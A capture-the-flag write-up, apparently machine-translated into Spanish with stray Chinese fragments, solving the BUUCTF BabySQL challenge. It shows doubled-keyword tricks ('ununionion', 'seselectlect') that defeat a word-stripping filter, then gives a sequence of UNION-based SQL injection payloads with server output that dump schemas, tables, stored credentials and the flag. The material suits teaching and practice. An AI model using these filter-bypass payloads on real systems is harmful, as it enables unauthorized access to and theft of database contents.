[BUUCTF] [Geek Challenge 2019] Reseña de BabySQL
Sitio de prueba 0x00
Bypass de escritura doble de inyección SQL
reemplazar función, buscar unión y seleccionar, etc. para ser reemplazado con vacío
Escritura doble que debe omitirse, dividida en el medio de la palabra, dividida por la mitad y ocultar una completa en su interior:
union
ununionion
select
seselectlect
from
frfromom
where
whwhereere
information
infoorrmation
(过滤了or)
order
oorrder
(过滤了or)
by
bbyy
Codificación de URL común
%20
空格
%23
#
%27
'
0x01 resolución de problemas
?username=admin&password=pwd %27 or 1=1 %23
Tiene un error en su sintaxis SQL; consulte el manual que corresponde a la versión de su servidor MariaDB para conocer la sintaxis correcta para usar cerca de '1 = 1' en la línea 1
No o, solo 1 = 1, o está filtrado
?username=admin&password=pwd %27 oorr 1=1 %23
Hola administrador!
Su contraseña es '09e6f2bc1ee446ef66b91bf09f58d0d4'
por también se filtra
?username=admin&password=pwd %27 oorrder bbyy 3 %23
NO, contraseña de nombre de usuario incorrecta !!!
?username=admin&password=pwd %27 oorrder bbyy 4 %23
Columna desconocida '4' en 'cláusula de orden'
Hay tres campos
?username=admin&password=pwd ' union select 1 #
Tiene un error en su sintaxis SQL; consulte el manual que corresponde a la versión de su servidor MariaDB para conocer la sintaxis correcta para usar cerca de '1' en la línea 1
Solo se habló de 1 #, lo que indica que se detectaron unión y selección
Bypass con doble escritura
?username=admin&password=pwd ' ununionion seselectlect 1 #
Tiene un error en su sintaxis SQL; consulte el manual que corresponde a la versión de su servidor MariaDB para conocer la sintaxis correcta para usar cerca de '' 'en la línea 1
No importa la barra de herramientas o el cuadro de URL #在这里必须用URL编码成%23, de lo contrario, no funcionará.
(No lo entiendo muy bien, solía estar en el recuadro de URL # ¿también está bien ???)
?username=admin&password=pwd %27 ununionion seselectlect 1 %23
Las sentencias SELECT utilizadas tienen un número diferente de columnas
Número incorrecto de columnas
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23
Hola 2!
Tu contraseña es '3'
?username=admin&password=pwd %27 ununionion seselectlect 1,2,version() %23
Hola 2!
Su contraseña es '10 .3.18-MariaDB '
?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23
Hola 2!
Tu contraseña es 'geek'
Biblioteca de ráfagas
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom
(infoorrmation_schema.schemata) %23
Hola 2!
Tu contraseña es
'information_schema, mysql, performance_schema, test, ctf, geek'
Mesa de ráfagas
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)from(information_schema.tables)whwhereere table_schema="geek" %23
Tiene un error en su sintaxis SQL; consulte el manual que corresponde a la versión de su servidor MariaDB para conocer la sintaxis correcta para usar cerca de '(infinfmationmation_schema.tables) donde table_schema = “geek” #' 'en la línea 1
la información se filtra o
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="geek" %23
Hola 2!
Su contraseña es 'b4bsql, geekuser'
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(table_name)frfromom(infoorrmation_schema.tables)
whwhereere table_schema="ctf" %23
Hola 2!
Tu contraseña es 'Bandera'
Estallar
?username=admin&password=pwd %27 ununionion seselectlect 1,2,
group_concat(column_name) frfromom (infoorrmation_schema.columns) whwhereere
table_name="Flag"%23
Hola 2!
Tu contraseña es 'bandera'
Verifique la columna de banderas de la tabla de banderas de la biblioteca ctf
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(flag)frfromom(ctf.Flag)%23
Hola 2!
Tu contraseña es 'flag {d3a1f578-e00b-47d4-96b4-9535be15f9de}'
otro
Mesa de ráfagas
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
Hola 2!
Tu contraseña es 'b4bsql, b4bsql, b4bsql, geekuser, geekuser, geekuser'
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
Hola 2!
Tu contraseña es 'b4bsql, geekuser'
Estallar
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
Hola 2!
Su contraseña es 'id, nombre de usuario, contraseña'
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
Hola 2!
Su contraseña es 'id, nombre de usuario, contraseña'
?username=1&password=pwd' uniunionon selselectect 1,username,passwoorrd frfromom b4bsql %23
Hola cl4y!
Tu contraseña es 'i_want_to_play_2077'
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23
Hola 2!
Su contraseña es
'1: cl4y: i_want_to_play_2077,2: sql: sql_injection_is_so_fun, 3: porn: do_you_know_pornhub, 4: git: github_is_different_from_pornhub, 5: Stop: you_found_flag_, 6_toldstop, : flag: flag {d3a1f578-e00b-47d4-96b4-9535be15f9de} '